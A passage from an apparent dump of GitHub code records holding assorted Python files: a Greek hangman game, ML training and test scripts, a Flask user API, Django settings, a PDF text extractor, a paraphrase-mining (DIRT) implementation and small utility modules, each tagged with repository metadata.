print(\"Το γράμμα το έχεις ξαναδώσει δώσε άλλο\")\r\n \r\n if leksi_in_grammata(leksi,grammata):\r\n print(f\"Συγχαρητήρια βρήκες τη λέξη '{leksi}'\")\r\n \r\n if lathi==5:\r\n print(\"Έχασες έκανες 5 λάθη\")\r\n print(f\"Η λέξη ήταν '{leksi}'\")\r\n play_again=input(\"Θέλεις να παίξεις ξανά (ναι/όχι): \")\r\n if play_again=='ναι':\r\n kremmala()\r\n \r\ndef print_leksi(leksi,grammata):\r\n for gramma in leksi:\r\n if gramma in grammata:\r\n print(gramma+' ', end='')\r\n else:\r\n print('_ ', end='')\r\n print('\\n')\r\n \r\ndef leksi_in_grammata(leksi,grammata):\r\n for i in leksi:\r\n if i not in grammata:\r\n return False\r\n return True\r\nkremmala()\r\n","repo_name":"k33theod/kremalla","sub_path":"kremala.py","file_name":"kremala.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73993299254","text":"# import necssary modules\nfrom st_pages import Page, show_pages\nimport streamlit.components.v1 as components\n\n# import config view\nfrom view.config import get_config\n\n# start home function\ndef start_home():\n # prepare current page config, set the page's title\n get_config(\"Home\")\n\n # open the html home page to be rendered\n render_page = open(\"view/index.html\")\n # render the html home\n components.html(render_page.read(), height = 2000)\n\n # create pages (home, machine modeling and checking)\n show_pages(\n [\n Page(\"main.py\", \"Home\", \":house:\"),\n Page(\"view/user.py\", \"Checking\", \":sound:\")\n ]\n )\n\n# code by @tudemaha","repo_name":"tudemaha/speech-emotion-classification","sub_path":"view/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"40571457335","text":"import numpy as np\nimport pandas as pd\nimport os\nimport sys\n\n##### COPY__PASTE__LIB__BEGIN #####\n\nbasepath = os.path.abspath(os.path.dirname(os.path.abspath(sys.argv[0])) + '/..')\nsys.path.append(basepath)\nfrom edgar_playground.t4_lib import *\n\n##### COPY__PASTE__LIB__END #####\n\nINPUT_DIR = '../input'\n# INPUT_DIR = '../work/subsample_5000'\n\n# WORK_DIR= '.'\nWORK_DIR = '../work/t4'\n\n# OUTPUT_DIR = '.'\nOUTPUT_DIR = '../work/t4'\n\nTYPE_WL = ['1JHC', '2JHC', '3JHC', '1JHN', '2JHN', '3JHN', '2JHH', '3JHH']\n# TYPE_WL = ['1JHN']\n\nTARGET_WL = ['scalar_coupling_constant']\n\nSEED = 55\nnp.random.seed(SEED)\n\nN_FOLD = {\n '_': 5,\n}\n\nN_ESTIMATORS = {\n '_': 12000,\n # '1JHC': 6000,\n # '2JHC': 4000,\n # '3JHC': 6000,\n # '1JHN': 6000,\n}\n\nPARAMS = {\n '_': {\n 'num_leaves': 128,\n 'min_child_samples': 79,\n 'objective': 'regression',\n 'max_depth': 9,\n 'learning_rate': 0.2,\n \"boosting_type\": \"gbdt\",\n \"subsample_freq\": 1,\n \"subsample\": 0.9,\n \"bagging_seed\": SEED,\n \"metric\": 'mae',\n \"verbosity\": -1,\n 'reg_alpha': 0.1,\n 'reg_lambda': 0.3,\n 'colsample_bytree': 1.0\n },\n '1JHN': {'subsample': 1, 'learning_rate': 0.05},\n # '1JHN': {'subsample': 1, 'learning_rate': 0.05, 'min_child_samples': 5, 'num_leaves': 500, 'max_depth': 11},\n '2JHN': {'subsample': 1, 'learning_rate': 0.05},\n '3JHN': {'subsample': 1, 'learning_rate': 0.05},\n '1JHC': {'min_child_samples': 120},\n # '2JHC': {'min_child_samples': 500, 'learning_rate': 0.2, 'num_leaves': 500, 'max_depth': 11},\n\n}\n\n# train, test, structures, contributions = t4_load_data(INPUT_DIR)\n#\n# train, test = t4_criskiev_features(train, test, structures)\n#\n# structures = t4_merge_yukawa(INPUT_DIR, structures)\n#\n# structures = t4_crane_features(structures)\n#\n# train, test = t4_merge_structures(train, test, structures)\n#\n# t4_distance_feature(train, test)\n#\n# t4_artgor_features(train, test)\n\n#\n# Save to and/or load from parquet\n#\n# t4_to_parquet(WORK_DIR, train, test, structures, contributions)\n\ntrain, test, structures, contributions = t4_read_parquet(WORK_DIR)\n\n#\n# Load Phase 1. OOF data Mulliken charge\n#\ntrain, test = t4_load_data_mulliken_oof(WORK_DIR, train, test)\n\n#\n# Load Phase 2. OOF data Contributions (fc, sd, pso, dso)\n#\ntrain, test = t4_load_data_contributions_oof(WORK_DIR, train, test)\n\n# t4_criskiev_features_extra(train, test)\n\n#\n# Predict final target (Scalar coupling constant)\n#\n\n# pd.set_option('display.max_rows', 200)\n# print(train.describe().T) # Verbose=True\n# print(train.dtypes.T)\n\nX, X_test, labels = t4_prepare_columns(train, test,\n good_columns_extra=['mulliken_charge_0', 'mulliken_charge_1', 'fc', 'sd',\n 'pso', 'dso', 'contrib_sum'])\nt4_do_predict(train, test, TYPE_WL, TARGET_WL, PARAMS, N_FOLD, N_ESTIMATORS, SEED, X, X_test, labels)\n\ntrain[['id'] + [f'oof_{c}' for c in TARGET_WL]].to_csv(f'{OUTPUT_DIR}/t4c_scc_train.csv', index=False)\ntest.rename(inplace=True, columns={'oof_scalar_coupling_constant': 'scalar_coupling_constant'})\ntest[['id'] + [f'{c}' for c in TARGET_WL]].to_csv(f'{OUTPUT_DIR}/t4c_scc_test.csv', index=False)\n","repo_name":"EdgarPE/champs-scalar-coupling","sub_path":"edgar/t4c_scc.py","file_name":"t4c_scc.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35576912728","text":"# from flask import request, jsonify\nfrom flask_restful import Resource, reqparse\nfrom app.models import users\n\n\nclass User(Resource):\n def get(self, name):\n \"\"\"\n Pobiera dane usera podanego w sciezce GET\n :param name: nazwa uzytkownika\n :return: dane uzytkownika w JSON\n \"\"\"\n print(\"Get for user: {user}\".format(user=name))\n for u in users:\n if name == u[\"name\"]:\n # return jsonify(u), 200\n return u, 200\n return \"User not found\", 404\n\n def post(self, name):\n \"\"\"\n Dodaje nowego Usera podanego w sciezce URL uzupelniajac dane o age i city przekazane w JSONie POSTa\n :param name: nazwa uzytkownika\n :param age: wiek w JSON POST\n :param city: miasto w JSON POST\n :return:\n \"\"\"\n if reqparse.request.is_json:\n print(\"New user: {user} - {json}\".format(user=name, json=reqparse.request.get_json()))\n else:\n return \"Only JSON data allowed\", 400\n\n parser = reqparse.RequestParser()\n parser.add_argument(\"age\")\n parser.add_argument(\"city\")\n args = parser.parse_args()\n\n for u in users:\n if name == u[\"name\"]:\n return \"User already exists\", 400\n\n u = {\n \"name\": name,\n \"age\": args[\"age\"],\n \"city\": args[\"city\"]\n }\n users.append(u)\n return u, 201\n\n def put(self, name):\n \"\"\"\n Aktualizacja istniejacego Usera\n :param name: nazwa uzytkownika\n :param age: wiek w JSON PUT\n :param city: miasto w JSON PUT\n :return:\n \"\"\"\n\n if reqparse.request.is_json:\n print(\"Change user: {user} - {json}\".format(user=name, json=reqparse.request.get_json()))\n else:\n return \"Only JSON data allowed\", 400\n\n parser = reqparse.RequestParser()\n parser.add_argument(\"age\")\n parser.add_argument(\"city\")\n args = parser.parse_args()\n\n for u in users:\n if name == u[\"name\"]:\n u[\"age\"] = args[\"age\"]\n u[\"city\"] = args[\"city\"]\n return u, 200\n\n u = {\n \"name\": name,\n \"age\": args[\"age\"],\n \"city\": args[\"city\"]\n }\n users.append(u)\n return u, 201\n\n def delete(self, name):\n \"\"\"\n Usuniecie wskazanego usera\n :param name: nazwa uzytkownika\n :return:\n \"\"\"\n global users\n print(\"Delete for user: {user}\".format(user=name))\n users = [user for user in users if user[\"name\"] != name]\n return \"{} is deleted\".format(name), 200\n","repo_name":"wrobelma/test_ws","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26696733237","text":"from settings.common import *\nimport django_heroku\nimport dj_database_url \n\n\nDEBUG = False\n\nALLOWED_HOSTS = ['bank-search-api.herokuapp.com']\n\nprod_db = dj_database_url.config(conn_max_age=500)\nDATABASES = {}\nDATABASES['default'] = {}\nDATABASES['default'].update(prod_db)\n\ndjango_heroku.settings(locals())","repo_name":"sudo-upmanyu/bank-search-api","sub_path":"settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22535927406","text":"# -*- coding: utf-8 -*- \n\"\"\"Created by ssfanli on 2022/03/03 \n\"\"\"\nimport time\n\nfrom screcord import record\nimport sys\nsys.path.append('.')\nfrom utils.boss import BossHelper\nfrom utils.const import PLATFORM, PACKAGE, COMMON\nfrom utils.frame import video2frame\nfrom utils.install import Installer\nfrom utils.tools import md, splice, abspath\nfrom utils.uidriver import BaseOperateAND, BaseOperateIOS\n\n\nclass YSPStart(object):\n\n def __init__(self, platform: str, device_id: str, app_path=None):\n self.plat = platform\n self.did = device_id\n self.app_path = app_path\n self.pkg_name = PACKAGE.YSP_AND if self.plat == PLATFORM.AND else PACKAGE.YSP_IOS\n self.base_dir = md(abspath(splice('../output/ysp', 'and' if self.plat == PLATFORM.AND else 'ios')))\n self.ins = Installer(self.plat, self.did)\n self.bo = None\n self.bh = None\n\n @property\n def boss_divide_id(self):\n \"\"\"get divide id\n\n ios need install and init firstly\n \"\"\"\n if self.plat == PLATFORM.AND:\n return COMMON.divide_id_mapping[self.did]\n if not self.bo:\n self.app_init()\n return self.bo.get_idfv()\n\n @property\n def app_ver(self):\n return self.ins.app_version(self.pkg_name)\n\n def download(self, which, version):\n raise NotImplementedError\n\n def install(self):\n if self.app_path:\n self.ins.install(self.app_path, self.pkg_name)\n\n def app_init(self):\n if self.plat == PLATFORM.AND:\n self.bo = BaseOperateAND(self.did, self.pkg_name)\n else:\n self.bo = BaseOperateIOS(self.did, self.pkg_name)\n\n def boss_init(self):\n \"\"\"boss_init place after in app_init\"\"\"\n self.bh = BossHelper(self.plat, self.boss_divide_id)\n\n def external_start(self):\n raise NotImplementedError\n\n def cold_start(self, repeat: int = 10, interval: int = 1):\n\n def before_test():\n self.install()\n self.app_init()\n self.boss_init()\n\n def after_test(dir_path):\n data = self.bh.get_data(page_size=repeat, keyword='app_launch_time', conversion=True)\n self.bh.save_data(splice(dir_path, f'report_data.json'), data)\n self.bh.data_analysis(data)\n\n def testing(video_fp):\n\n @video2frame(video_fp)\n @record(self.plat, self.did, video_fp, offset=(1.5, 2), pre_kill=False)\n def _start_in_ios():\n self.bo.to_click(label='央视频')\n self.bo.wait_for_appear()\n\n @video2frame(video_fp)\n @record(self.plat, self.did, video_fp, offset=(1, 0))\n def _start_in_and():\n self.bo.to_click(text='央视频')\n self.bo.wait_for_appear()\n\n if self.plat == PLATFORM.AND:\n return _start_in_and()\n return _start_in_ios()\n\n before_test()\n app_ver = self.app_ver\n video_dir = md(splice(self.base_dir, app_ver))\n for _ in range(repeat):\n self.bo.close_app()\n testing(splice(video_dir, f'cold_start_{_ + 1}.mp4'))\n time.sleep(interval)\n after_test(video_dir)\n return app_ver, video_dir\n\n\nif __name__ == '__main__':\n # , '/Users/ssfanli/Desktop/YSP_v241.apk'\n ysp = YSPStart('android', 'TEV0217315000851')\n # , '/Users/ssfanli/Desktop/cctvvideo-ios_2.4.2.66007_enterprise_sign.ipa'\n # ysp = YSPStart('ios', '00008020-001D1D900CB9002E')\n ysp.cold_start(3)\n\n\n","repo_name":"Ztmr27/ysptimetest","sub_path":"case/ysp_start.py","file_name":"ysp_start.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11373142770","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfilelist = ['000000120420.jpg', '000000166287.jpg', '000000166391.jpg', '000000212559.jpg', '000000286994.jpg',\n '000000300659.jpg', '000000438862.jpg', '000000460347.jpg', '000000509735.jpg']\n\ndef unblockshaped(arr, h, w):\n \"\"\"\n Return an array of shape (h, w) where\n h * w = arr.size\n\n If arr is of shape (n, nrows, ncols), n sublocks of shape (nrows, ncols),\n then the returned array preserves the \"physical\" layout of the sublocks.\n \"\"\"\n n, nrows, ncols = arr.shape\n return (arr.reshape(h//nrows, -1, nrows, ncols)\n .swapaxes(1,2)\n .reshape(h, w))\n\ndef dct_flatten_2d(img):\n height, width, channel = img.shape\n N = int(math.sqrt(channel))\n height_resized, width_resized = height * N, width * N\n\n # Do 8x8 DCT on image (in-place)\n img = img.reshape((height, width, N, N)).reshape(-1, N, N).astype(dtype='float32')\n img_resized = unblockshaped(img, height_resized, width_resized)\n return img_resized\n\n\ndef plot_dct(img, filename):\n if filename in filelist:\n dct = dct_flatten_2d(img)\n plt.figure()\n plt.imshow(dct,cmap='gray',vmax = np.max(dct)*0.01,vmin = 0)\n plt.title( \"8x8 DCTs of the image\")\n plt.savefig(filename)","repo_name":"kaix90/DCTNet","sub_path":"segmentation/mmdet/utils/plot_dct.py","file_name":"plot_dct.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":413,"dataset":"github-code","pt":"21"} +{"seq_id":"42812090145","text":"while True:\n nome = input(\"Digite um nome: \")\n if nome == \"sair\":\n break\n aceleracao = input(\"Qual aceleração? \")\n \ndef calcula_tempo(dic):\n dicionario = {}\n for nome,aceleracao in dic.items():\n dicionario[nome] = ((200/aceleracao)**(1/2))\n return dicionario","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_196/ch78_2020_06_22_16_33_38_215597.py","file_name":"ch78_2020_06_22_16_33_38_215597.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44527914626","text":"from functools import cmp_to_key\n\ndef comparator(a,b):\n t1 = a+b\n t2 = b+a\n \n if t1 > t2:\n return 1\n elif t1 == t2:\n return 0\n else:\n return -1\n\ndef solution(numbers):\n n = [str(x) for x in numbers]\n n = sorted(n, key=cmp_to_key(comparator),reverse=True)\n answer = str(int(''.join(n)))\n return answer","repo_name":"yurrrri/swift_algorithm_programmers_and_swexpert","sub_path":"프로그래머스/lv2/42746. 가장 큰 수/가장 큰 수.py","file_name":"가장 큰 수.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38519283153","text":"import streamlit as st\nimport pdfplumber\nimport pandas as pd\n\nst.title(\"Pdf File Converter\")\nst.subheader(\"Welcome in pdf to text converter\")\n\n\ndef extract_text(feed):\n lin = []\n lines=\"\"\n with pdfplumber.load(feed) as pdf:\n pages = pdf.pages\n for page in pdf.pages:\n text = page.extract_text()\n for line in text.split('\\n'):\n lines+=line\n lin.append(lines)\n #st.text(lin[0])\n return lin \n\nuploaded_file = st.file_uploader(\"upload pdf file\", type=None, key=None)\nif uploaded_file is not None:\n data = extract_text(uploaded_file)\n st.text(\"Below is the extracted text from PDF file\")\n stri=data[0]\n st.text(stri)\n ","repo_name":"Chirag-kumar-dev/AIChamp","sub_path":"Task4-API/first API/fapp.py","file_name":"fapp.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42191122393","text":"# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/topics/items.html\n\nfrom scrapy.item import Item, Field\n\nclass MerchItem(Item):\n merchant_url = Field()\n url = Field()\n name = Field()\n description = Field()\n inventory = Field()\n image_urls = Field()\n images = Field() # leave empty, will be auto-populated\n","repo_name":"blaisco/merch-scraper","sub_path":"merch/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73036590453","text":"import copy\nfrom numbers import Number as Num\nfrom unittest import TestCase\n\nfrom plotly import files, session, utils\n\n\nclass PlotlyTestCase(TestCase):\n\n # parent test case to assist with clean up of local credentials/config\n\n def __init__(self, *args, **kwargs):\n self._credentials = None\n self._config = None\n self._graph_reference = None\n self._session = None\n super(PlotlyTestCase, self).__init__(*args, **kwargs)\n\n @classmethod\n def setUpClass(cls):\n session._session = {\n 'credentials': {},\n 'config': {},\n 'plot_options': {}\n }\n\n def setUp(self):\n self.stash_session()\n self.stash_files()\n defaults = dict(files.FILE_CONTENT[files.CREDENTIALS_FILE],\n **files.FILE_CONTENT[files.CONFIG_FILE])\n session.sign_in(**defaults)\n\n def tearDown(self):\n self.restore_files()\n self.restore_session()\n\n def stash_files(self):\n if files.check_file_permissions():\n self._credentials = utils.load_json_dict(files.CREDENTIALS_FILE)\n self._config = utils.load_json_dict(files.CONFIG_FILE)\n\n def restore_files(self):\n if files.check_file_permissions():\n if self._credentials is not None:\n utils.save_json_dict(files.CREDENTIALS_FILE, self._credentials)\n if self._config is not None:\n utils.save_json_dict(files.CONFIG_FILE, self._config)\n\n def stash_session(self):\n self._session = copy.deepcopy(session._session)\n\n def restore_session(self):\n session._session.clear() # clear and update to preserve references.\n session._session.update(self._session)\n\n\ndef compare_dict(dict1, dict2, equivalent=True, msg='', tol=10e-8):\n for key in dict1:\n if key not in dict2:\n return (False,\n \"{0} should be {1}\".format(\n list(dict1.keys()), list(dict2.keys())))\n for key in dict1:\n if isinstance(dict1[key], dict):\n equivalent, msg = compare_dict(dict1[key],\n dict2[key],\n tol=tol)\n elif isinstance(dict1[key], Num) and isinstance(dict2[key], Num):\n if not comp_nums(dict1[key], dict2[key], tol):\n return False, \"['{0}'] = {1} should be {2}\".format(key,\n dict1[key],\n dict2[key])\n elif is_num_list(dict1[key]) and is_num_list(dict2[key]):\n if not comp_num_list(dict1[key], dict2[key], tol):\n return False, \"['{0}'] = {1} should be {2}\".format(key,\n dict1[key],\n dict2[key])\n elif not (dict1[key] == dict2[key]):\n return False, \"['{0}'] = {1} should be {2}\".format(key,\n dict1[key],\n dict2[key])\n if not equivalent:\n return False, \"['{0}']\".format(key) + msg\n return equivalent, msg\n\n\ndef comp_nums(num1, num2, tol=10e-8):\n return abs(num1 - num2) < tol\n\n\ndef comp_num_list(list1, list2, tol=10e-8):\n for item1, item2 in zip(list1, list2):\n if not comp_nums(item1, item2, tol):\n return False\n return True\n\n\ndef is_num_list(item):\n try:\n for thing in item:\n if not isinstance(thing, Num):\n raise TypeError\n except TypeError:\n return False\n return True\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/plotly_plotly.py/plotly.py-master/plotly/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"7542980977","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport sys\nimport numpy as np\nimport math\nimport argparse\nimport pprint\n\nimport cv2 # NOQA (Must import before importing caffe2 due to bug in cv2)\n\nfrom core.config_rel import (cfg, load_params_from_file, load_params_from_list)\nfrom modeling import model_builder_rel\nimport utils.c2\nimport utils.train\nfrom utils.timer import Timer\nfrom utils.training_stats_rel import TrainingStats\nimport utils.env as envu\nimport utils.net_rel as nu\nimport utils.metrics_rel as metrics\nfrom utils import helpers_rel\nfrom utils import checkpoints_rel\nfrom utils import evaluator_rel\n\nfrom caffe2.python import workspace\n\nimport logging\n\nFORMAT = '[%(levelname)s: %(filename)s: %(lineno)4d]: %(message)s'\nlogging.basicConfig(level=logging.INFO, format=FORMAT, stream=sys.stdout)\nlogger = logging.getLogger(__name__)\n\nutils.c2.import_contrib_ops()\nutils.c2.import_detectron_ops()\n\n# OpenCL may be enabled by default in OpenCV3; disable it because it's not\n# thread safe and causes unwanted GPU memory allocations.\ncv2.ocl.setUseOpenCL(False)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='Test a network'\n )\n parser.add_argument(\n '--cfg',\n dest='cfg_file',\n help='Config file for testing (and optionally testing)',\n default=None,\n type=str\n )\n parser.add_argument(\n 'opts',\n help='See lib/core/config.py for all options',\n default=None,\n nargs=argparse.REMAINDER\n )\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n return parser.parse_args()\n\n\ndef test():\n\n test_model, output_dir, checkpoint_dir = \\\n model_builder_rel.create(cfg.MODEL.MODEL_NAME, train=False, split='test')\n logger.info('Test model built.')\n total_test_iters = int(math.ceil(\n float(len(test_model.roi_data_loader._roidb)) / float(cfg.NUM_DEVICES))) + 5\n test_evaluator = evaluator_rel.Evaluator(\n split=cfg.TEST.DATA_TYPE,\n roidb_size=len(test_model.roi_data_loader._roidb))\n test_timer = Timer()\n logger.info('Test epoch iters: {}'.format(total_test_iters))\n\n accumulated_accs = {}\n for key in test_evaluator.__dict__.keys():\n if key.find('acc') >= 0:\n accumulated_accs[key] = []\n # wins are for showing different plots\n wins = {}\n for key in test_evaluator.__dict__.keys():\n if key.find('acc') >= 0:\n wins[key] = None\n\n params_file = cfg.TEST.WEIGHTS\n checkpoints_rel.initialize_params_from_file(\n model=test_model, weights_file=params_file,\n num_devices=cfg.NUM_DEVICES,\n )\n test_evaluator.reset()\n print(\"=> Testing model\")\n for test_iter in range(0, total_test_iters):\n test_timer.tic()\n workspace.RunNet(test_model.net.Proto().name)\n test_timer.toc()\n test_evaluator.eval_im_dets_triplet_topk()\n logger.info('Tested {}/{} time: {}'.format(\n test_iter, total_test_iters, round(test_timer.average_time, 3)))\n iter_accs = test_evaluator.calculate_and_plot_accuracy()\n for key in iter_accs.keys():\n accumulated_accs[key].append(iter_accs[key])\n test_evaluator.save_all_dets()\n\n test_model.roi_data_loader.shutdown()\n\n logger.info('Testing has successfully finished...exiting!')\n\n\nif __name__ == '__main__':\n\n args = parse_args()\n logger.info('Called with args:')\n logger.info(args)\n if args.cfg_file is not None:\n load_params_from_file(args.cfg_file)\n if args.opts is not None:\n load_params_from_list(args.opts)\n logger.info('Testing with config:')\n logger.info(pprint.pformat(cfg))\n\n test()\n","repo_name":"facebookresearch/Large-Scale-VRD","sub_path":"tools/test_net_rel.py","file_name":"test_net_rel.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"21"} +{"seq_id":"43868654981","text":"# !/usr/bin/env python3\n# -*- coding:utf-8 -*-\n#\n# Author: Flyaway - flyaway1217@gmail.com\n# Blog: zhouyichu.com\n#\n# Python release: 3.4.5\n#\n# Date: 2017-03-01 13:29:29\n# Last modified: 2017-03-01 19:30:02\n\n\"\"\"\nMain entrance of the dirt algorithm.\n\"\"\"\n\nimport sys\n\nfrom utils import IOManager\nfrom utils import Extractor\nfrom database import Database\nfrom similarity import Similarity\n\n\nclass DIRT:\n def __init__(self):\n self.IO = IOManager()\n self.exactor = Extractor('illegal.txt')\n\n def _construct_database(self, corpus_path):\n \"\"\"Construct the database based on the corpus.\n\n Args:\n corpus_path: str - The path of corpus.\n\n Returns:\n Database\n \"\"\"\n database = Database()\n # construct the database\n for words, poss in self.IO.read_sentences(corpus_path):\n triples = self.exactor.extract(words, poss)\n for triple in triples:\n database.insert(triple)\n\n return database\n\n def run(self, corpus_path, test_path, minfreq):\n self._database = self._construct_database(corpus_path)\n before_unique, before_total = self._stas(self._database)\n self._database.apply_minfreq(minfreq)\n after_unique, after_total = self._stas(self._database)\n sim = Similarity(self._database)\n test_phrases = self.IO.read_phrases(test_path)\n\n with open('trace.txt', 'w', encoding='utf8') as f:\n # Write the head line.\n args = [before_unique, after_unique, before_total, after_total]\n f.write('\\n')\n self._write_head(f, args)\n\n for phrase in test_phrases:\n most_similar = self._find_k_similar(phrase, sim, 5)\n self._write_result(f, phrase, most_similar)\n\n def _stas(self, database):\n \"\"\"Return the statistic of the database.\n \"\"\"\n return len(database), database.path_number()\n\n def _write_head(self, f, args):\n \"\"\"Write the head line for output.\n \"\"\"\n s = 'Found {a} distinct paths, {b} after minfreq filtering.\\n'\n s = s.format(a=args[0], b=args[1])\n f.write(s)\n\n s = 'Found {a} path instances, {b} after minfreq filtering.\\n'\n s = s.format(a=args[2], b=args[3])\n f.write(s)\n f.write('\\n')\n\n def _find_k_similar(self, phrase, sim, k=5):\n \"\"\"Find the k most similar paths.\n\n If phrase does not in the database, reutrn None\n\n Args:\n phrase: str\n sim: Similarity\n k: int\n\n Returns:\n a list of tuple with size of k.\n Each tuple contains the path and corrsponding score.\n \"\"\"\n if phrase not in self._database:\n return None\n\n reval = [(path, sim.PathSim(phrase, path)) for path in self._database]\n reval.sort(key=lambda x: x[-1], reverse=True)\n # To deal with tie cases.\n value = reval[k-1][-1]\n reval = [v for v in reval if v[-1] >= value]\n return reval\n\n def _write_result(self, f, phrase, result):\n \"\"\"Write thr result into files.\n\n Args:\n f: file\n phrase: str\n result: list(tuple(path, score))\n \"\"\"\n s = 'MOST SIMILAR RULES FOR: {a}\\n'.format(a=phrase)\n n = 'This phrase is not in the triple database.\\n'\n t = '{a}. {b}\\t{c}\\n'\n f.write(s)\n if result is None:\n f.write(n)\n else:\n for i, item in enumerate(result):\n path = str(item[0])\n score = str(item[-1])\n tt = t.format(a=str(i+1), b=path, c=score)\n f.write(tt)\n f.write('\\n')\n\n\nif __name__ == '__main__':\n runner = DIRT()\n corpus_path = sys.argv[1]\n test_path = sys.argv[2]\n minfreq = int(sys.argv[3])\n runner.run(corpus_path, test_path, minfreq)\n","repo_name":"flyaway1217/CS-6390-Information-Extraction","sub_path":"program #2 (DIRT)/source/dirt.py","file_name":"dirt.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10739050766","text":"#\n# @lc app=leetcode.cn id=92 lang=python3\n#\n# [92] 反转链表 II\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseBetween(self, head: ListNode, left: int, right: int) -> ListNode: \n cnt = 1\n dummy = ListNode()\n dummy.next = head\n pre = dummy\n while pre and cnt1 category for meta: %s.\" % self.__metaDict)\n return self.__metaDict['category'][0]\n\n def isTagPresent(self, strTag):\n return self.__metaDict['tags'].count(strTag) > 0\n\n def loadFile(self, filename):\n #print(\"loadFile: \" + filename)\n\n fh = open(filename, 'r')\n metaLines = fh.readlines()\n fh.close()\n\n #.meta file format to python dictionary\n for line in metaLines:\n if line.find(':') == -1:\n continue\n assert( len(line.split(':')) == 2 )\n metaTag = line.split(':')[0]\n self.__metaDict[metaTag] = []\n for metaTagItem in line.split(':')[1].split(','):\n if metaTagItem.strip() != '':\n self.__metaDict[metaTag].append(metaTagItem.strip())\n\n def toHtml(self):\n\n htmlMeta = '

    Page Metadata

    '\n for key, val in self.__metaDict.iteritems():\n htmlMeta = htmlMeta + '%s: %s
    ' % (key, val)\n htmlMeta = htmlMeta + '
    '\n\n return str(htmlMeta)\n\nclass WebdocEntry:\n\n def __init__(self):\n self.__title = None\n\n def __cmp__(self, other):\n if self.getDate() > other.getDate():\n return -1\n else:\n return 1\n\n def getTitle(self):\n return self.__title\n\n def getBriefDescription(self):\n return self.getTitle()\n\n def getTags(self):\n return self.__metadata.getTags()\n\n def getEntrySubUrl(self):\n return self.__entrySubUrl\n\n def getDate(self):\n return self.__metadata.getDate()\n\n def getCategory(self):\n return self.__metadata.getCategory()\n\n def getMetaDescription(self):\n return self.getTitle()\n\n def getMetaKeywords(self):\n str = \", \".join(self.__metadata.getTags())\n str = self.__metadata.getCategory() + \", \" + str\n return str\n\n def isWebReady(self):\n if self.__metadata.isTagPresent('noweb'):\n return False\n else:\n return True\n\n def toHtml(self):\n assert self.__html != None\n return self.__html\n\n def __tryFindTitleFromHtml(self, html):\n title = None\n\n #Use the first '

    ' tag found in html\n for html_line in html.splitlines():\n m = re.match(r\"

    (.*)

    \", html_line)\n if m is not None and len(m.groups()) is not 0:\n title = m.groups()[0]\n break\n\n return title\n\n def loadFromDataFolder(self, dataFolder):\n\n #Locate html file\n path = ws_globals.blogGeneratedFolder + '/' + dataFolder.lower()\n files = []\n\n # Correct a path that came lower-cased.\n if not os.path.isdir(path):\n allF = os.listdir(ws_globals.blogGeneratedFolder)\n fMap = {x.lower(): x for x in allF}\n path = ws_globals.blogGeneratedFolder + '/' + fMap[dataFolder.lower()]\n\n if os.path.isdir(path):\n files = os.listdir(path)\n else:\n raise Exception(\"Cannot find path: %s (df: %s).\" % (path, dataFolder))\n\n htmlFile = None\n for file in files:\n if file.find('.html') != -1:\n htmlFile = file\n\n #Copy to html answer\n if htmlFile is not None:\n fh = open(path + '/' + htmlFile, 'r')\n self.__html = fh.read()\n fh.close()\n\n if self.__html is None:\n raise Exception(\"Could not find html\")\n\n #Provide a sub-url\n self.__entrySubUrl = dataFolder\n\n #Try to provide a title from html\n #@tag Should put tags there, as well as provide a special metadata field in order to override\n #@tag this is done at RUNTIME! --> move this to pre-computed data!\n self.__title = dataFolder + ': ' + str(self.__tryFindTitleFromHtml(self.__html))\n #Failback = use source folder as title\n if self.__title is None:\n self.__title = dataFolder\n\n #Insert footer with metadata\n metaFile = None\n for file in files:\n if file.find('.meta') != -1:\n metaFile = file\n if metaFile is not None:\n webdocMetadata = WebdocMetadata()\n webdocMetadata.loadFile(path + '/' + metaFile)\n self.__metadata = webdocMetadata\n\n self.__html = self.__html + 